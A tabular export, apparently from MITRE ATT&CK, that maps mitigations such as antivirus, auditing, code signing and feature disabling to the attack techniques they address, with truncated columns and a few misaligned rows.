M1049 Antivirus/ course-of- mitigation mitigates T1566 Phishing attack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1027.014Polymorphiattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1059.001PowerShellattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1059.006Python attack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1027.002Software Pattack-pat technique Employ heu
M1049 Antivirus/ course-of- mitigation mitigates T1566.001Spearphishattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1566.003Spearphishiattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1080 Taint Shar attack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1221 Template Iattack-pat technique Network/Ho
M1049 Antivirus/ course-of- mitigation mitigates T1059.005Visual Basiattack-pat technique Anti-virus
M1013 Applicatio course-of- mitigation mitigates T1550.001Applicatio attack-pat technique Consider im
M1013 Applicatio course-of- mitigation mitigates T1593.003Code Reposattack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1195.001Compromise attack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1574.002DLL Side-L attack-pat technique When possib
M1013 Applicatio course-of- mitigation mitigates T1212 Exploitatioattack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1564.012File/Path Eattack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1564 Hide Artifaattack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique When possib
M1013 Applicatio course-of- mitigation mitigates T1559 Inter-Proc attack-pat technique Enable the
M1013 Applicatio course-of- mitigation mitigates T1647 Plist File Mattack-pat technique Ensure app
M1013 Applicatio course-of- mitigation mitigates T1564.009Resource Fattack-pat technique Configure a
M1013 Applicatio course-of- mitigation mitigates T1496.003SMS Pumpiattack-pat technique Consider i
M1013 Applicatio course-of- mitigation mitigates T1593 Search Op attack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1195 Supply Chaattack-pat technique Application
M1013 Applicatio course-of- mitigation mitigates T1550 Use Altern attack-pat technique Consider im
M1013 Applicatio course-of- mitigation mitigates T1078 Valid Acco attack-pat technique Ensure that
M1013 Applicatio course-of- mitigation mitigates T1559.003XPC Servic attack-pat technique Enable the
M1048 Applicationcourse-of- mitigation mitigates T1559.001Componentattack-pat technique Ensure all
M1048 Applicationcourse-of- mitigation mitigates T1021.003Distribute attack-pat technique Ensure all
M1048 Applicationcourse-of- mitigation mitigates T1189 Drive-by C attack-pat technique Other types of virtualization
M1048 Applicationcourse-of- mitigation mitigates T1559.002Dynamic Daattack-pat technique Ensure Prot
M1048 Applicationcourse-of- mitigation mitigates T1611 Escape to attack-pat technique Consider ut
M1048 Applicationcourse-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Application
M1048 Applicationcourse-of- mitigation mitigates T1203 Exploitatioattack-pat technique Other types of virtualization
M1048 Applicationcourse-of- mitigation mitigates T1212 Exploitatioattack-pat technique Make it dif
M1048 Applicationcourse-of- mitigation mitigates T1211 Exploitatioattack-pat technique Make it dif
M1048 Applicationcourse-of- mitigation mitigates T1068 Exploitatioattack-pat technique Make it dif
M1048 Applicationcourse-of- mitigation mitigates T1210 Exploitatioattack-pat technique Browser
Make it dif
sandboxes can be us
M1048 Applicationcourse-of- mitigation mitigates T1027.006HTML Smugattack-pat technique
M1048 Applicationcourse-of- mitigation mitigates T1559 Inter-Proc attack-pat technique Ensure all
M1047 Audit course-of- mitigation mitigates T1558.004AS-REP Roaattack-pat technique Kerberos pr
M1047 Audit course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique Check for
M1047 Audit course-of- mitigation mitigates T1550.001Applicatio attack-pat technique Administrat
M1047 Audit course-of- mitigation mitigates T1560 Archive Coattack-pat technique System scan
M1047 Audit course-of- mitigation mitigates T1560.001Archive viaattack-pat technique System scan
M1047 Audit course-of- mitigation mitigates T1053.002At attack-pat technique Toolkits li
M1047 Audit course-of- mitigation mitigates T1176 Browser Exattack-pat technique Ensure ext
M1047 Audit course-of- mitigation mitigates T1612 Build Imagattack-pat technique Audit imag
M1047 Audit course-of- mitigation mitigates T1548.002Bypass Useattack-pat technique Check for
M1047 Audit course-of- mitigation mitigates T1558.005Ccache Fileattack-pat technique Enable and
M1047 Audit course-of- mitigation mitigates T1552.008Chat Mess attack-pat technique Preemptive
M1047 Audit course-of- mitigation mitigates T1070.008Clear Mail attack-pat technique In an Excha
M1047 Audit course-of- mitigation mitigates T1087.004Cloud Accoattack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1593.003Code Reposattack-pat technique Scan public
M1047 Audit course-of- mitigation mitigates T1213.003Code Reposattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1059 Command attack-pat
an technique Inventory s
M1047 Audit course-of- mitigation mitigates T1213.001Confluenceattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1578.002Create Clo attack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1578.001Create Snaattack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1543 Create or attack-pat technique Use auditin
M1047 Audit course-of- mitigation mitigates T1552.001Credentialsattack-pat technique Preemptivel
M1047 Audit course-of- mitigation mitigates T1552.002Credentialsattack-pat technique Proactively
M1047 Audit course-of- mitigation mitigates T1053.003Cron attack-pat technique Review cha
M1047 Audit course-of- mitigation mitigates T1213.004Customer Rattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1574.001DLL Searchattack-pat technique Use the program sxstrace.exe
M1047 Audit course-of- mitigation mitigates T1530 Data from attack-pat technique Frequently
M1047 Audit course-of- mitigation mitigates T1213 Data from attack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1578.003Delete Clo attack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1610 Deploy Conattack-pat technique Scan images
M1047 Audit course-of- mitigation mitigates T1562.002Disable Wiattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1562.007Disable or attack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1562.012Disable or attack-pat technique To ensure Audit rules can no
M1047 Audit course-of- mitigation mitigates T1562.004Disable or attack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1482 Domain Truattack-pat technique Map the tru
M1047 Audit course-of- mitigation mitigates T1484 Domain or attack-pat technique Identify an
M1047 Audit course-of- mitigation mitigates T1114 Email Colleattack-pat technique In an Exchange environment
M1047 Audit course-of- mitigation mitigates T1114.003Email Forwattack-pat technique In an Exchange environment
M1047 Audit course-of- mitigation mitigates T1564.008Email Hidinattack-pat technique In an Exchange environment
M1047 Audit course-of- mitigation mitigates T1574.005Executableattack-pat technique Use auditin
M1047 Audit course-of- mitigation mitigates T1027.011Fileless St attack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1606 Forge Webattack-pat technique Enable advanced auditing on
M1047 Audit course-of- mitigation mitigates T1484.001Group Poliattack-pat technique Identify an
M1047 Audit course-of- mitigation mitigates T1552.006Group Poliattack-pat technique Search SYS
M1047 Audit course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Clean up old Windows Regist
M1047 Audit course-of- mitigation mitigates T1556.007Hybrid Idenattack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1505.004IIS Componattack-pat technique Regularly c
M1047 Audit course-of- mitigation mitigates T1562 Impair Defattack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1525 Implant In attack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1546.006LC_LOAD_Dattack-pat technique Binaries ca
M1047 Audit course-of- mitigation mitigates T1543.004Launch Da attack-pat technique Use auditin
M1047 Audit course-of- mitigation mitigates T1059.011Lua attack-pat technique Inventory s
M1047 Audit course-of- mitigation mitigates T1204.003Malicious attack-pat technique Audit imag
M1047 Audit course-of- mitigation mitigates T1036.010Masqueradattack-pat technique Audit user
M1047 Audit course-of- mitigation mitigates T1036 Masqueradattack-pat technique Audit user
M1047 Audit course-of- mitigation mitigates T1213.005Messaging attack-pat technique Preemptive
M1047 Audit course-of- mitigation mitigates T1556 Modify Autattack-pat technique Periodically review for new a
M1047 Audit course-of- mitigation mitigates T1578.005Modify Cloattack-pat technique Routinely m
M1047 Audit course-of- mitigation mitigates T1578 Modify Cloattack-pat technique Routinely
M1047 Audit course-of- mitigation mitigates T1666 Modify Cloattack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1556.006Multi-Fact attack-pat technique Review MFA
M1047 Audit course-of- mitigation mitigates T1556.008Network Prattack-pat technique Ensure only valid network pr
M1047 Audit course-of- mitigation mitigates T1027 Obfuscatedattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1574.007Path Inter attack-pat technique Clean up old Windows Regist
M1047 Audit course-of- mitigation mitigates T1574.008Path Intercattack-pat technique Clean up old Windows Regist
M1047 Audit course-of- mitigation mitigates T1574.009Path Inter attack-pat technique Clean up old Windows Regist
M1047 Audit course-of- mitigation mitigates T1566 Phishing attack-pat technique Perform aud
M1047 Audit course-of- mitigation mitigates T1653 Power Settattack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1542 Pre-OS Booattack-pat technique Perform aud
M1047 Audit course-of- mitigation mitigates T1552.004Private Keyattack-pat technique Ensure only
M1047 Audit course-of- mitigation mitigates T1059.006Python attack-pat technique Inventory s
M1047 Audit course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Audit the
M1047 Audit course-of- mitigation mitigates T1542.004ROMMONki attack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Audit the
M1047 Audit course-of- mitigation mitigates T1021 Remote Serattack-pat technique Perform aud
M1047 Audit course-of- mitigation mitigates T1606.002SAML Tokeattack-pat technique Enable adva
M1047 Audit course-of- mitigation mitigates T1505.001SQL Storedattack-pat technique Regularly c
M1047 Audit course-of- mitigation mitigates T1053.005Scheduled attack-pat technique Toolkits li
M1047 Audit course-of- mitigation mitigates T1053 Scheduled attack-pat technique Toolkits li
M1047 Audit course-of- mitigation mitigates T1593 Search Op attack-pat technique Scan public
M1047 Audit course-of- mitigation mitigates T1505 Server Sof attack-pat technique Regularly c
M1047 Audit course-of- mitigation mitigates T1574.010Services F attack-pat technique Use auditin
M1047 Audit course-of- mitigation mitigates T1213.002Sharepointattack-pat technique Consider pe
M1047 Audit course-of- mitigation mitigates T1566.001Spearphishattack-pat technique Enable audi
M1047 Audit course-of- mitigation mitigates T1566.002Spearphishattack-pat technique Audit appli
M1047 Audit course-of- mitigation mitigates T1566.003Spearphishiattack-pat technique Implement a
M1047 Audit course-of- mitigation mitigates T1528 Steal Appliattack-pat technique Administrat
M1047 Audit course-of- mitigation mitigates T1539 Steal Web attack-pat technique Implement a
M1047 Audit course-of- mitigation mitigates T1649 Steal or Foattack-pat technique Check and r
M1047 Audit course-of- mitigation mitigates T1558 Steal or Foattack-pat technique Perform aud
M1047 Audit course-of- mitigation mitigates T1548.006TCC Manipu attack-pat technique Routinely c
M1047 Audit course-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Periodicall
M1047 Audit course-of- mitigation mitigates T1505.005Terminal Sattack-pat technique Regularly c
M1047 Audit course-of- mitigation mitigates T1505.002Transport attack-pat technique Regularly c
M1047 Audit course-of- mitigation mitigates T1552 Unsecuredattack-pat technique Preemptivel
M1047 Audit course-of- mitigation mitigates T1550 Use Altern attack-pat technique Perform aud
M1047 Audit course-of- mitigation mitigates T1021.005VNC attack-pat technique Inventory
M1047 Audit course-of- mitigation mitigates T1606.001Web Cookiattack-pat technique Administrat
M1047 Audit course-of- mitigation mitigates T1543.003Windows Se attack-pat technique Use auditin
M1040 Behavior Pcourse-of- mitigation mitigates T1137.006Add-ins attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.004Asynchronoattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1027.010Command aOttack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1059 Command attack-pat
an technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1543 Create or attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1486 Data Encryattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1006 Direct Vol attack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1559.002Dynamic Daattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.001Dynamic-linattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1027.009Embeddedattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1027.013Encrypted/attack-pat technique Security tools should be confi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.011Extra Windattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1559 Inter-Proc attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1059.007JavaScript attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1574.013KernelCall attack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1027.012LNK Icon S attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1003.001LSASS Memattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.015ListPlantin attack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1204.002Malicious Fattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1036.008Masquerade attack-pat technique Implement s
M1040 Behavior Pcourse-of- mitigation mitigates T1036 Masqueradattack-pat technique Implement s
M1040 Behavior Pcourse-of- mitigation mitigates T1106 Native API attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1003 OS Credentattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1027 Obfuscatedattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137 Office Applattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137.001Office Temattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137.002Office Testattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137.003Outlook Foattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137.004Outlook H attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1137.005Outlook Ruattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1027.014Polymorphiattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.002Portable Exattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.009Proc Memoattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.013Process Doattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.012Process Hoattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055 Process Injattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.008Ptrace Systattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1216.001PubPrn attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1091 Replicatio attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1569.002Service Ex attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1569 System Serattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.003Thread Exeattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1055.005Thread Locattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1204 User Execuattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1055.014VDSO Hijacattack-pat technique Some endpoi
M1040 Behavior Pcourse-of- mitigation mitigates T1059.005Visual Basiattack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1047 Windows M attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1546.003Windows Ma attack-pat technique On Windows
M1040 Behavior Pcourse-of- mitigation mitigates T1543.003Windows Se attack-pat technique On Windows
M1046 Boot Integrcourse-of- mitigation mitigates T1542.003Bootkit attack-pat technique Use Truste
M1046 Boot Integrcourse-of- mitigation mitigates T1553.006Code Signinattack-pat technique Use of Sec
M1046 Boot Integrcourse-of- mitigation mitigates T1195.003Compromisattack-pat technique Use Trusted
M1046 Boot Integrcourse-of- mitigation mitigates T1601.002Downgradeattack-pat technique Some vendor
M1046 Boot Integrcourse-of- mitigation mitigates T1495 Firmware Cattack-pat technique Check the i
M1046 Boot Integrcourse-of- mitigation mitigates T1601 Modify Sysattack-pat technique Some vendor
M1046 Boot Integrcourse-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Some vendor
M1046 Boot Integrcourse-of- mitigation mitigates T1542 Pre-OS Booattack-pat technique Use Trusted
M1046 Boot Integrcourse-of- mitigation mitigates T1542.004ROMMONki attack-pat technique Enable secu
M1046 Boot Integrcourse-of- mitigation mitigates T1195 Supply Chaattack-pat technique Use secure
M1046 Boot Integrcourse-of- mitigation mitigates T1542.001System Fi attack-pat technique Check the i
M1046 Boot Integrcourse-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Enable secu
M1045 Code Signi course-of- mitigation mitigates T1059.002AppleScripattack-pat technique Require tha
M1045 Code Signi course-of- mitigation mitigates T1127.002ClickOnce attack-pat technique Enforce bin
M1045 Code Signi course-of- mitigation mitigates T1059 Command attack-pat
an technique Where possi
M1045 Code Signi course-of- mitigation mitigates T1554 Compromise attack-pat technique Ensure all
M1045 Code Signi course-of- mitigation mitigates T1543 Create or attack-pat technique Enforce reg
M1045 Code Signi course-of- mitigation mitigates T1601.002Downgradeattack-pat technique Many vendor
M1045 Code Signi course-of- mitigation mitigates T1505.004IIS Componattack-pat technique Ensure IIS
M1045 Code Signi course-of- mitigation mitigates T1525 Implant In attack-pat technique Several clo
M1045 Code Signi course-of- mitigation mitigates T1036.001Invalid Codattack-pat technique Require sig
M1045 Code Signi course-of- mitigation mitigates T1546.006LC_LOAD_Dattack-pat technique Enforce tha
M1045 Code Signi course-of- mitigation mitigates T1204.003Malicious attack-pat technique Utilize a t
M1045 Code Signi course-of- mitigation mitigates T1036 Masqueradattack-pat technique Require sig
M1045 Code Signi course-of- mitigation mitigates T1036.005Match Legiattack-pat technique Require sig
M1045 Code Signi course-of- mitigation mitigates T1601 Modify Sysattack-pat technique Many vendor
M1045 Code Signi course-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Many vendor
M1045 Code Signi course-of- mitigation mitigates T1059.001PowerShellattack-pat technique Set PowerSh
M1045 Code Signi course-of- mitigation mitigates T1546.013PowerShellattack-pat technique Enforce exe
M1045 Code Signi course-of- mitigation mitigates T1505.001SQL Storedattack-pat technique Ensure all
M1045 Code Signi course-of- mitigation mitigates T1505 Server Sof attack-pat technique Ensure all
M1045 Code Signi course-of- mitigation mitigates T1505.002Transport attack-pat technique Ensure all
M1045 Code Signi course-of- mitigation mitigates T1543.003Windows Se attack-pat technique Enforce reg
M1043 Credential course-of- mitigation mitigates T1558.005Ccache Fileattack-pat technique Protect res
M1043 Credential course-of- mitigation mitigates T1601.002Downgradeattack-pat technique Some embedd
M1043 Credential course-of- mitigation mitigates T1547.008LSASS Driv attack-pat technique On Windows
M1043 Credential course-of- mitigation mitigates T1003.001LSASS Memattack-pat technique With Window
M1043 Credential course-of- mitigation mitigates T1601 Modify Sysattack-pat technique Some embedd
M1043 Credential course-of- mitigation mitigates T1599.001Network Adattack-pat technique Some embedd
M1043 Credential course-of- mitigation mitigates T1599 Network Boattack-pat technique Some embedd
M1043 Credential course-of- mitigation mitigates T1003 OS Credentattack-pat technique With Window
M1043 Credential course-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Some embedd
M1043 Credential course-of- mitigation mitigates T1558 Steal or Foattack-pat technique On Linux sy
M1053 Data Backucourse-of- mitigation mitigates T1485 Data Destrattack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1486 Data Encryattack-pat technique Consider im
Consider implementing IT dis
M1053 Data Backucourse-of- mitigation mitigates T1491 Defacemenattack-pat technique
M1053 Data Backucourse-of- mitigation mitigates T1561.001Disk Conteattack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1561.002Disk Struc attack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1561 Disk Wipe attack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1491.002External D attack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1490 Inhibit Sy attack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1491.001Internal D attack-pat technique Consider im
M1053 Data Backucourse-of- mitigation mitigates T1485.001Lifecycle-Tattack-pat technique Consider im
M1057 Data Loss course-of- mitigation mitigates T1005 Data from attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1025 Data from attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1048.002Exfiltrati attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1041 Exfiltratio attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1052 Exfiltratio attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1048.003Exfiltrati attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1567 Exfiltratio attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1567.004Exfiltrati attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1052.001Exfiltratio attack-pat technique Data loss p
M1057 Data Loss course-of- mitigation mitigates T1020.001Traffic Dupattack-pat technique Implement D
M1057 Data Loss course-of- mitigation mitigates T1537 Transfer D attack-pat technique Data loss p
M1042 Disable or course-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1098 Account Ma attack-pat technique Remove unn
M1042 Disable or course-of- mitigation mitigates T1098.001Additional attack-pat technique Remove unne
M1042 Disable or course-of- mitigation mitigates T1098.002Additional attack-pat technique If email de
M1042 Disable or course-of- mitigation mitigates T1557 Adversary-attack-pat technique Disable leg
M1042 Disable or course-of- mitigation mitigates T1218.003CMSTP attack-pat technique CMSTP.exe m
M1042 Disable or course-of- mitigation mitigates T1127.002ClickOnce attack-pat technique ClickOnce may not be necess
M1042 Disable or course-of- mitigation mitigates T1552.005Cloud Inst attack-pat technique Disable unn
M1042 Disable or course-of- mitigation mitigates T1059 Command attack-pat
an technique Disable or
M1042 Disable or course-of- mitigation mitigates T1092 Communicaattack-pat technique Disable Aut
M1042 Disable or course-of- mitigation mitigates T1609 Container attack-pat technique Remove unn
M1042 Disable or course-of- mitigation mitigates T1021.008Direct Clo attack-pat technique If direct v
M1042 Disable or course-of- mitigation mitigates T1021.003Distribute attack-pat technique Consider d
M1042 Disable or course-of- mitigation mitigates T1562.010Downgradeattack-pat technique Consider r
M1042 Disable or course-of- mitigation mitigates T1559.002Dynamic Daattack-pat technique Registry ke
M1042 Disable or course-of- mitigation mitigates T1218.015Electron Apattack-pat technique Remove or d
M1042 Disable or course-of- mitigation mitigates T1114.003Email Forwattack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1546.014Emond attack-pat technique Consider d
M1042 Disable or course-of- mitigation mitigates T1611 Escape to attack-pat technique Remove unn
M1042 Disable or course-of- mitigation mitigates T1011.001Exfiltratio attack-pat technique Disable Blu
M1042 Disable or course-of- mitigation mitigates T1011 Exfiltrati attack-pat technique Disable WiF
M1042 Disable or course-of- mitigation mitigates T1052 Exfiltratio attack-pat technique Disable Aut
M1042 Disable or course-of- mitigation mitigates T1052.001Exfiltratio attack-pat technique Disable Aut
M1042 Disable or course-of- mitigation mitigates T1210 Exploitatioattack-pat technique Minimize av
M1042 Disable or course-of- mitigation mitigates T1133 External R attack-pat technique Disable or
M1042 Disable or course-of- mitigation mitigates T1218.004InstallUtil attack-pat technique InstallUtil
M1042 Disable or course-of- mitigation mitigates T1559 Inter-Proc attack-pat technique Registry ke
M1042 Disable or course-of- mitigation mitigates T1059.007JavaScript attack-pat technique Turn off or
M1042 Disable or course-of- mitigation mitigates T1557.001LLMNR/NBT attack-pat technique Disable LLM
M1042 Disable or course-of- mitigation mitigates T1218.014MMC attack-pat technique MMC may not
M1042 Disable or course-of- mitigation mitigates T1127.001MSBuild attack-pat technique MSBuild.ex
M1042 Disable or course-of- mitigation mitigates T1553.005Mark-of-thattack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1218.013Mavinject attack-pat technique Consider re
M1042 Disable or course-of- mitigation mitigates T1218.005Mshta attack-pat technique Mshta.exe m
M1042 Disable or course-of- mitigation mitigates T1218.007Msiexec attack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1046 Network Seattack-pat technique Ensure that
M1042 Disable or course-of- mitigation mitigates T1218.008Odbcconf attack-pat technique Odbcconf.e
M1042 Disable or course-of- mitigation mitigates T1137 Office Applattack-pat technique Disable
Disable Office
Office add-ins.
add-ins. If
If they
they
M1042 Disable or course-of- mitigation mitigates T1137.001Office Temattack-pat technique
M1042 Disable or course-of- mitigation mitigates T1059.001PowerShellattack-pat technique Disable/restrict the WinRM S
M1042 Disable or course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Disable the
M1042 Disable or course-of- mitigation mitigates T1547.007Re-openedattack-pat technique This featur
M1042 Disable or course-of- mitigation mitigates T1218.009Regsvcs/R attack-pat technique Regsvcs an
M1042 Disable or course-of- mitigation mitigates T1219 Remote Accattack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Disable the
M1042 Disable or course-of- mitigation mitigates T1563 Remote Serattack-pat technique Disable the
M1042 Disable or course-of- mitigation mitigates T1021 Remote Serattack-pat technique If remote s
M1042 Disable or course-of- mitigation mitigates T1091 Replicatio attack-pat technique Disable Aut
M1042 Disable or course-of- mitigation mitigates T1564.006Run Virtualattack-pat technique Disable Hyp
M1042 Disable or course-of- mitigation mitigates T1021.004SSH attack-pat technique Disable the
M1042 Disable or course-of- mitigation mitigates T1098.004SSH Authorattack-pat technique Disable SSH
M1042 Disable or course-of- mitigation mitigates T1563.001SSH Hijack attack-pat technique Ensure that
M1042 Disable or course-of- mitigation mitigates T1546.002Screensaveattack-pat technique Use Group P
M1042 Disable or course-of- mitigation mitigates T1505 Server Sof attack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1649 Steal or Foattack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1218 System Binattack-pat technique Many nativ
M1042 Disable or course-of- mitigation mitigates T1221 Template Iattack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1205 Traffic Signattack-pat technique Disable Wak
M1042 Disable or course-of- mitigation mitigates T1127 Trusted Dev attack-pat technique Specific de
M1042 Disable or course-of- mitigation mitigates T1564.007VBA Stompattack-pat technique Turn off or
M1042 Disable or course-of- mitigation mitigates T1021.005VNC attack-pat technique Uninstall
M1042 Disable or course-of- mitigation mitigates T1218.012Verclsid attack-pat technique Consider re
M1042 Disable or course-of- mitigation mitigates T1059.005Visual Basiattack-pat technique Turn off o
M1042 Disable or course-of- mitigation mitigates T1505.003Web Shell attack-pat technique Consider di
M1042 Disable or course-of- mitigation mitigates T1555.004Windows Cattack-pat technique Consider en
M1042 Disable or course-of- mitigation mitigates T1021.006Windows Rattack-pat technique Disable th
M1042 Disable or course-of- mitigation mitigates T1595.003Wordlist S attack-pat technique Remove or d
M1055 Do Not Mitcourse-of- mitigation mitigates T1480.001Environmen attack-pat technique [Environmen
M1055 Do Not Mitcourse-of- mitigation mitigates T1480 Execution attack-pat technique [Execution
M1055 Do Not Mitcourse-of- mitigation mitigates T1480.002Mutual Excattack-pat technique [Execution
M1041 Encrypt Sencourse-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Ensure that
M1041 Encrypt Sencourse-of- mitigation mitigates T1558.004AS-REP Roaattack-pat technique Enable AES
M1041 Encrypt Sencourse-of- mitigation mitigates T1557 Adversary-attack-pat technique Ensure that
M1041 Encrypt Sencourse-of- mitigation mitigates T1550.001Applicatio attack-pat technique File encryp
M1041 Encrypt Sencourse-of- mitigation mitigates T1119 Automatedattack-pat technique Encryption
M1041 Encrypt Sencourse-of- mitigation mitigates T1070.002Clear Linu attack-pat technique Obfuscate/e
M1041 Encrypt Sencourse-of- mitigation mitigates T1070.001Clear Windattack-pat technique Obfuscate/e
M1041 Encrypt Sencourse-of- mitigation mitigates T1659 Content Injattack-pat technique Where possi
M1041 Encrypt Sencourse-of- mitigation mitigates T1565 Data Manipattack-pat technique Consider en
M1041 Encrypt Sencourse-of- mitigation mitigates T1530 Data from attack-pat technique Encrypt dat
M1041 Encrypt Sencourse-of- mitigation mitigates T1602 Data from attack-pat technique Configure
M1041 Encrypt Sencourse-of- mitigation mitigates T1213 Data from attack-pat technique Encrypt dat
M1041 Encrypt Sencourse-of- mitigation mitigates T1114 Email Colleattack-pat technique Use of encr
M1041 Encrypt Sencourse-of- mitigation mitigates T1114.003Email Forwattack-pat technique Use of encr
M1041 Encrypt Sencourse-of- mitigation mitigates T1070 Indicator attack-pat technique Obfuscate/e
M1041 Encrypt Sencourse-of- mitigation mitigates T1558.003Kerberoastattack-pat technique Enable AES
